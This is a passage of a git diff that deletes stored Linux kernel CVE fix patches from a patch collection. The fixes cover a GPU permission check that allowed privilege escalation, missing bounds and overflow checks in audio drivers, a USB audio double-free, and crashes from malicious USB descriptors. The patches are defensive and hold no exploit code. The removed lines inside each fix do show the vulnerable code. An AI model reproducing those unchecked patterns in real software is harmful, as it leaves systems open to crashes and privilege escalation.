-EINVAL; -@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_debug("%s: EQ_BAND_INDEX val:%d\n", - __func__, eq->band_index); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_BAND_INDEX_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_BAND_INDEX", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_BAND_INDEX; -- *updt_params++ = EQ_BAND_INDEX_PARAM_SZ; -- *updt_params++ = eq->band_index; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_BAND_INDEX_PARAM_SZ; -+ *updt_params++ = -+ eq->band_index; - } - break; - case EQ_SINGLE_BAND_FREQ: -@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n"); - break; - } -- eq->freq_millihertz = *values++; -+ eq->freq_millihertz = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n", - __func__, eq->band_index, eq->freq_millihertz); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_SINGLE_BAND_FREQ", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ; -- *updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ; -- *updt_params++ = eq->freq_millihertz; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ *updt_params++ = -+ eq->freq_millihertz; - } - break; - default: -@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - 
else -@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - { - int devices; - int num_commands; -- char *params; -+ char *params = NULL; - int *updt_params, i; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -+ long *param_max_offset; - int rc = 0; - - pr_debug("%s: instance: %d\n", __func__, instance); -@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - __func__); - return -EINVAL; - } -- if (!ac) { -- pr_err("%s: cannot set audio effects as audio client is NULL\n", -- __func__); -+ param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ devices = GET_NEXT(values, param_max_offset, rc); -+ num_commands = GET_NEXT(values, param_max_offset, rc); -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { -+ pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } - params = kzalloc(params_length, GFP_KERNEL); -@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - pr_err("%s, params memory alloc failed\n", __func__); - return -ENOMEM; - } -- devices = *values++; -- num_commands = *values++; - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case SOFT_VOLUME_GAIN_2CH: - case SOFT_VOLUME2_GAIN_2CH: - if (length != 2 || index_offset != 0) { -- pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n"); -+ pr_err("VOLUME_GAIN_2CH: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } -- vol->left_gain = *values++; -- 
vol->right_gain = *values++; -+ vol->left_gain = GET_NEXT(values, param_max_offset, rc); -+ vol->right_gain = -+ GET_NEXT(values, param_max_offset, rc); - vol->master_gain = 0x2000; - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_2CH", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - case SOFT_VOLUME_GAIN_MASTER: - case SOFT_VOLUME2_GAIN_MASTER: - if (length != 1 || index_offset != 0) { -- pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n"); -+ pr_err("VOLUME_GAIN_MASTER: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } - vol->left_gain = 0x2000; - vol->right_gain = 0x2000; -- vol->master_gain = *values++; -+ vol->master_gain = -+ GET_NEXT(values, 
param_max_offset, rc); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_MASTER", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - default: -@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - break; - } - } -- if (params_length) -+ if (params_length && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - invalid_config: -diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -index f814434..b4bd43d 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct 
snd_kcontrol *kcontrol,
- struct snd_ctl_elem_info *uinfo)
- {
- uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
-- uinfo->count = 128;
-+ uinfo->count = MAX_PP_PARAMS_SZ;
- uinfo->value.integer.min = 0;
- uinfo->value.integer.max = 0xFFFFFFFF;
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch
deleted file mode 100644
index 1266bd30..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 410cfa95f0a1cf58819cbfbd896f9aa45b004ac0 Mon Sep 17 00:00:00 2001
-From: Tarun Karra
-Date: Thu, 17 Mar 2016 21:10:36 -0700
-Subject: msm: kgsl: verify user memory permissions before mapping to GPU
- driver
-
-For user memory of type KGSL_USER_MEM_TYPE_ADDR mapped to GPU driver
-verify permissions and map GPU permissions same as CPU permissions.
-If elevated permissions are requested return an error to prevent
-privilege escalation. Without this check user could map readonly
-memory into GPU driver as readwrite and gain elevated privilege.
-
-Write permissions check is currently inverted causing readonly
-user pages to be mapped as readwrite in GPU driver. Fix this
-check to map readonly pages as readonly.
-
-CRs-Fixed: 988993
-Change-Id: I0e097d7e4e4c414c0849e33bcc61a26fb94291ad
-Signed-off-by: Tarun Karra
----
- drivers/gpu/msm/kgsl.c | 24 ++++++++++++++++++++++--
- 1 file changed, 22 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index d5e96ab..cecc463 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1961,6 +1961,20 @@ static inline int _check_region(unsigned long start, unsigned long size,
- return (end > len);
- }
-
-+static int check_vma_flags(struct vm_area_struct *vma,
-+ unsigned int flags)
-+{
-+ unsigned long flags_requested = (VM_READ | VM_WRITE);
-+
-+ if (flags & KGSL_MEMFLAGS_GPUREADONLY)
-+ flags_requested &= ~VM_WRITE;
-+
-+ if ((vma->vm_flags & flags_requested) == flags_requested)
-+ return 0;
-+
-+ return -EFAULT;
-+}
-+
- static int check_vma(struct vm_area_struct *vma, struct file *vmfile,
- struct kgsl_memdesc *memdesc)
- {
-@@ -1974,7 +1988,7 @@ static int check_vma(struct vm_area_struct *vma, struct file *vmfile,
- if (vma->vm_start != memdesc->useraddr ||
- (memdesc->useraddr + memdesc->size) != vma->vm_end)
- return -EINVAL;
-- return 0;
-+ return check_vma_flags(vma, memdesc->flags);
- }
-
- static int memdesc_sg_virt(struct kgsl_memdesc
*memdesc, struct file *vmfile)
-@@ -1983,7 +1997,7 @@ static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
- long npages = 0, i;
- size_t sglen = (size_t) (memdesc->size / PAGE_SIZE);
- struct page **pages = NULL;
-- int write = (memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) != 0;
-+ int write = ((memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) ? 0 : 1);
-
- if (sglen == 0 || sglen >= LONG_MAX)
- return -EINVAL;
-@@ -2102,6 +2116,12 @@ static int kgsl_setup_dmabuf_useraddr(struct kgsl_device *device,
- if (vma && vma->vm_file) {
- int fd;
-
-+ ret = check_vma_flags(vma, entry->memdesc.flags);
-+ if (ret) {
-+ up_read(¤t->mm->mmap_sem);
-+ return ret;
-+ }
-+
- /*
- * Check to see that this isn't our own memory that we have
- * already mapped
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch
deleted file mode 100644
index 69a66f37..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 01ee86da5a0cd788f134e360e2be517ef52b6b00 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang
-Date: Tue, 26 Apr 2016 14:35:38 +0800
-Subject: ASoC: msm: audio-effects: misc fixes in h/w accelerated effect
-
-Adding memory copy size check and integer overflow check in h/w
-accelerated effect driver.
-
-Change-Id: I17d4cc0a38770f0c5067fa8047cd63e7bf085e48
-CRs-Fixed: 1006609
-Signed-off-by: Weiyin Jiang
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 8 +++++---
- sound/soc/msm/qdsp6v2/q6asm.c | 8 +++++++-
- 2 files changed, 12 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..525d72a 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -164,7 +164,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
-
- pr_debug("%s: dec buf size: %d, num_buf: %d, enc buf size: %d, num_buf: %d\n",
- __func__, effects->config.output.buf_size,
-- effects->config.output.buf_size,
-+ effects->config.output.num_buf,
- effects->config.input.buf_size,
- effects->config.input.num_buf);
- rc = q6asm_audio_client_buf_alloc_contiguous(IN, effects->ac,
-@@ -252,7 +252,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
-
- bufptr = q6asm_is_cpu_buf_avail(IN, effects->ac, &size, &idx);
- if (bufptr) {
-- if (copy_from_user(bufptr, (void *)arg,
-+ if ((effects->config.buf_cfg.output_len > size) ||
-+ copy_from_user(bufptr, (void *)arg,
- effects->config.buf_cfg.output_len)) {
- rc = -EFAULT;
- goto ioctl_fail;
-@@ -308,7 +309,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- rc = -EFAULT;
- goto ioctl_fail;
- }
-- if (copy_to_user((void *)arg, bufptr,
-+ if ((effects->config.buf_cfg.input_len > size) ||
-+ copy_to_user((void *)arg, bufptr,
- effects->config.buf_cfg.input_len)) {
- rc = -EFAULT;
- goto ioctl_fail;
-diff --git
a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0991d30..1c6e938 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- * Author: Brian Swetland
- *
- * This software is licensed under the terms of the GNU General Public
-@@ -1212,6 +1212,12 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir,
-
- ac->port[dir].buf = buf;
-
-+ /* check for integer overflow */
-+ if ((bufcnt > 0) && ((INT_MAX / bufcnt) < bufsz)) {
-+ pr_err("%s: integer overflow\n", __func__);
-+ mutex_unlock(&ac->cmd_lock);
-+ goto fail;
-+ }
- bytes_to_alloc = bufsz * bufcnt;
-
- /* The size to allocate should be multiple of 4K bytes */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch
deleted file mode 100644
index e0050c6a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 836b34a935abc91e13e63053d0a83b24dfb5ea78 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Thu, 31 Mar 2016 12:05:43 -0400
-Subject: ALSA: usb-audio: Fix double-free in error paths after
- snd_usb_add_audio_stream() call
-
-create_fixed_stream_quirk(), snd_usb_parse_audio_interface() and
-create_uaxx_quirk() functions allocate the audioformat object by themselves
-and free it upon error before returning. However, once the object is linked
-to a stream, it's freed again in snd_usb_audio_pcm_free(), thus it'll be
-double-freed, eventually resulting in a memory corruption.
-
-This patch fixes these failures in the error paths by unlinking the audioformat
-object before freeing it.
-
-Based on a patch by Takashi Iwai
-
-[Note for stable backports:
- this patch requires the commit 902eb7fd1e4a ('ALSA: usb-audio: Minor
- code cleanup in create_fixed_stream_quirk()')]
-
-Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1283358
-Reported-by: Ralf Spenneberg
-Cc: # see the note above
-Signed-off-by: Vladis Dronov
-Signed-off-by: Takashi Iwai
----
- sound/usb/quirks.c | 4 ++++
- sound/usb/stream.c | 6 +++++-
- 2 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
-index fb62bce..6178bb5 100644
---- a/sound/usb/quirks.c
-+++ b/sound/usb/quirks.c
-@@ -150,6 +150,7 @@ static int create_fixed_stream_quirk(struct snd_usb_audio *chip,
- usb_audio_err(chip, "cannot memdup\n");
- return -ENOMEM;
- }
-+ INIT_LIST_HEAD(&fp->list);
- if (fp->nr_rates > MAX_NR_RATES) {
- kfree(fp);
- return -EINVAL;
-@@ -193,6 +194,7 @@ static int create_fixed_stream_quirk(struct snd_usb_audio *chip,
- return 0;
-
- error:
-+ list_del(&fp->list); /* unlink for avoiding double-free */
- kfree(fp);
- kfree(rate_table);
- return err;
-@@ -469,6 +471,7 @@ static int create_uaxx_quirk(struct snd_usb_audio *chip,
- fp->ep_attr = get_endpoint(alts, 0)->bmAttributes;
- fp->datainterval = 0;
- fp->maxpacksize =
le16_to_cpu(get_endpoint(alts, 0)->wMaxPacketSize);
-+ INIT_LIST_HEAD(&fp->list);
-
- switch (fp->maxpacksize) {
- case 0x120:
-@@ -492,6 +495,7 @@ static int create_uaxx_quirk(struct snd_usb_audio *chip,
- ? SNDRV_PCM_STREAM_CAPTURE : SNDRV_PCM_STREAM_PLAYBACK;
- err = snd_usb_add_audio_stream(chip, stream, fp);
- if (err < 0) {
-+ list_del(&fp->list); /* unlink for avoiding double-free */
- kfree(fp);
- return err;
- }
-diff --git a/sound/usb/stream.c b/sound/usb/stream.c
-index c4dc577..8e9548bc 100644
---- a/sound/usb/stream.c
-+++ b/sound/usb/stream.c
-@@ -314,7 +314,9 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
- /*
- * add this endpoint to the chip instance.
- * if a stream with the same endpoint already exists, append to it.
-- * if not, create a new pcm stream.
-+ * if not, create a new pcm stream. note, fp is added to the substream
-+ * fmt_list and will be freed on the chip instance release. do not free
-+ * fp or do remove it from the substream fmt_list to avoid double-free.
- */
- int snd_usb_add_audio_stream(struct snd_usb_audio *chip,
- int stream,
-@@ -675,6 +677,7 @@ int snd_usb_parse_audio_interface(struct snd_usb_audio *chip, int iface_no)
- * (fp->maxpacksize & 0x7ff);
- fp->attributes = parse_uac_endpoint_attributes(chip, alts, protocol, iface_no);
- fp->clock = clock;
-+ INIT_LIST_HEAD(&fp->list);
-
- /* some quirks for attributes here */
-
-@@ -723,6 +726,7 @@ int snd_usb_parse_audio_interface(struct snd_usb_audio *chip, int iface_no)
- dev_dbg(&dev->dev, "%u:%d: add audio endpoint %#x\n", iface_no, altno, fp->endpoint);
- err = snd_usb_add_audio_stream(chip, stream, fp);
- if (err < 0) {
-+ list_del(&fp->list); /* unlink for avoiding double-free */
- kfree(fp->rate_table);
- kfree(fp->chmap);
- kfree(fp);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch
deleted file mode 100644
index 5731daee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch
+++ /dev/null
@@ -1,109 +0,0 @@
-From 950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Wed, 23 Mar 2016 11:53:46 -0700
-Subject: Input: ati_remote2 - fix crashes on detecting device with invalid
- descriptor
-
-The ati_remote2 driver expects at least two interfaces with one
-endpoint each. If given malicious descriptor that specify one
-interface or no endpoints, it will crash in the probe function.
-Ensure there is at least two interfaces and one endpoint for each
-interface before using it.
-
-The full disclosure: http://seclists.org/bugtraq/2016/Mar/90
-
-Reported-by: Ralf Spenneberg
-Signed-off-by: Vladis Dronov
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/misc/ati_remote2.c | 36 ++++++++++++++++++++++++++++++------
- 1 file changed, 30 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/input/misc/ati_remote2.c b/drivers/input/misc/ati_remote2.c
-index cfd58e8..1c5914c 100644
---- a/drivers/input/misc/ati_remote2.c
-+++ b/drivers/input/misc/ati_remote2.c
-@@ -817,26 +817,49 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
-
- ar2->udev = udev;
-
-+ /* Sanity check, first interface must have an endpoint */
-+ if (alt->desc.bNumEndpoints < 1 || !alt->endpoint) {
-+ dev_err(&interface->dev,
-+ "%s(): interface 0 must have an endpoint\n", __func__);
-+ r = -ENODEV;
-+ goto fail1;
-+ }
- ar2->intf[0] = interface;
- ar2->ep[0] = &alt->endpoint[0].desc;
-
-+ /* Sanity check, the device must have two interfaces */
- ar2->intf[1] = usb_ifnum_to_if(udev, 1);
-+ if ((udev->actconfig->desc.bNumInterfaces < 2) || !ar2->intf[1]) {
-+ dev_err(&interface->dev, "%s(): need 2 interfaces, found %d\n",
-+ __func__, udev->actconfig->desc.bNumInterfaces);
-+ r = -ENODEV;
-+ goto fail1;
-+ }
-+
- r = usb_driver_claim_interface(&ati_remote2_driver, ar2->intf[1], ar2);
- if (r)
- goto fail1;
-+
-+ /* Sanity check, second interface must have an endpoint */
- alt =
ar2->intf[1]->cur_altsetting;
-+ if (alt->desc.bNumEndpoints < 1 || !alt->endpoint) {
-+ dev_err(&interface->dev,
-+ "%s(): interface 1 must have an endpoint\n", __func__);
-+ r = -ENODEV;
-+ goto fail2;
-+ }
- ar2->ep[1] = &alt->endpoint[0].desc;
-
- r = ati_remote2_urb_init(ar2);
- if (r)
-- goto fail2;
-+ goto fail3;
-
- ar2->channel_mask = channel_mask;
- ar2->mode_mask = mode_mask;
-
- r = ati_remote2_setup(ar2, ar2->channel_mask);
- if (r)
-- goto fail2;
-+ goto fail3;
-
- usb_make_path(udev, ar2->phys, sizeof(ar2->phys));
- strlcat(ar2->phys, "/input0", sizeof(ar2->phys));
-@@ -845,11 +868,11 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
-
- r = sysfs_create_group(&udev->dev.kobj, &ati_remote2_attr_group);
- if (r)
-- goto fail2;
-+ goto fail3;
-
- r = ati_remote2_input_init(ar2);
- if (r)
-- goto fail3;
-+ goto fail4;
-
- usb_set_intfdata(interface, ar2);
-
-@@ -857,10 +880,11 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
-
- return 0;
-
-- fail3:
-+ fail4:
- sysfs_remove_group(&udev->dev.kobj, &ati_remote2_attr_group);
-- fail2:
-+ fail3:
- ati_remote2_urb_cleanup(ar2);
-+ fail2:
- usb_driver_release_interface(&ati_remote2_driver, ar2->intf[1]);
- fail1:
- kfree(ar2);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch
deleted file mode 100644
index bfc78434..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 9c6ba456711687b794dcf285856fc14e2c76074f Mon Sep 17 00:00:00 2001
-From: Josh Boyer
-Date: Mon, 14 Mar 2016 09:33:40 -0700
-Subject: Input: powermate - fix oops with malicious USB descriptors
-
-The powermate driver expects at least one valid USB endpoint in its
-probe function. If given malicious descriptors that specify 0 for
-the number of endpoints, it will crash. Validate the number of
-endpoints on the interface before using them.
-
-The full report for this issue can be found here:
-http://seclists.org/bugtraq/2016/Mar/85
-
-Reported-by: Ralf Spenneberg
-Cc: stable
-Signed-off-by: Josh Boyer
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/misc/powermate.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/input/misc/powermate.c b/drivers/input/misc/powermate.c
-index 63b539d..84909a1 100644
---- a/drivers/input/misc/powermate.c
-+++ b/drivers/input/misc/powermate.c
-@@ -307,6 +307,9 @@ static int powermate_probe(struct usb_interface *intf, const struct usb_device_i
- int error = -ENOMEM;
-
- interface = intf->cur_altsetting;
-+ if (interface->desc.bNumEndpoints < 1)
-+ return -EINVAL;
-+
- endpoint = &interface->endpoint[0].desc;
- if (!usb_endpoint_is_int_in(endpoint))
- return -EIO;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch
deleted file mode 100644
index d6b97d0d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 162f98dea487206d9ab79fc12ed64700667a894d Mon Sep 17 00:00:00 2001
-From: Vladis Dronov
-Date: Thu, 31 Mar 2016 10:53:42 -0700
-Subject: Input: gtco - fix crash on detecting device without endpoints
-
-The gtco driver expects at least one valid endpoint. If given malicious
-descriptors that specify 0 for the number of endpoints, it will crash in
-the probe function. Ensure there is at least one endpoint on the interface
-before using it.
-
-Also let's fix a minor coding style issue.
-
-The full correct report of this issue can be found in the public
-Red Hat Bugzilla:
-
-https://bugzilla.redhat.com/show_bug.cgi?id=1283385
-
-Reported-by: Ralf Spenneberg
-Signed-off-by: Vladis Dronov
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/tablet/gtco.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/tablet/gtco.c b/drivers/input/tablet/gtco.c
-index 3a7f3a4..7c18249 100644
---- a/drivers/input/tablet/gtco.c
-+++ b/drivers/input/tablet/gtco.c
-@@ -858,6 +858,14 @@ static int gtco_probe(struct usb_interface *usbinterface,
- goto err_free_buf;
- }
-
-+ /* Sanity check that a device has an endpoint */
-+ if (usbinterface->altsetting[0].desc.bNumEndpoints < 1) {
-+ dev_err(&usbinterface->dev,
-+ "Invalid number of endpoints\n");
-+ error = -EINVAL;
-+ goto err_free_urb;
-+ }
-+
- /*
- * The endpoint is always altsetting 0, we know this since we know
- * this device only has one interrupt endpoint
-@@ -879,7 +887,7 @@ static int gtco_probe(struct usb_interface *usbinterface,
- * HID report descriptor
- */
- if (usb_get_extra_descriptor(usbinterface->cur_altsetting,
-- HID_DEVICE_TYPE, &hid_desc) != 0){
-+ HID_DEVICE_TYPE, &hid_desc) != 0) {
- dev_err(&usbinterface->dev,
- "Can't retrieve exta USB descriptor to get hid report descriptor length\n");
- error = -EIO;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch
deleted file mode 100644
index 1f95444c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4ec0ef3a82125efc36173062a50624550a900ae0 Mon Sep 17 00:00:00 2001
-From: Josh Boyer
-Date: Mon, 14 Mar 2016 10:42:38 -0400
-Subject: USB: iowarrior: fix oops with malicious USB descriptors
-
-The iowarrior driver expects at least one valid endpoint. If given
-malicious descriptors that specify 0 for the number of endpoints,
-it will crash in the probe function. Ensure there is at least
-one endpoint on the interface before using it.
-
-The full report of this issue can be found here:
-http://seclists.org/bugtraq/2016/Mar/87
-
-Reported-by: Ralf Spenneberg
-Cc: stable
-Signed-off-by: Josh Boyer
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/misc/iowarrior.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
-index c6bfd13..1950e87 100644
---- a/drivers/usb/misc/iowarrior.c
-+++ b/drivers/usb/misc/iowarrior.c
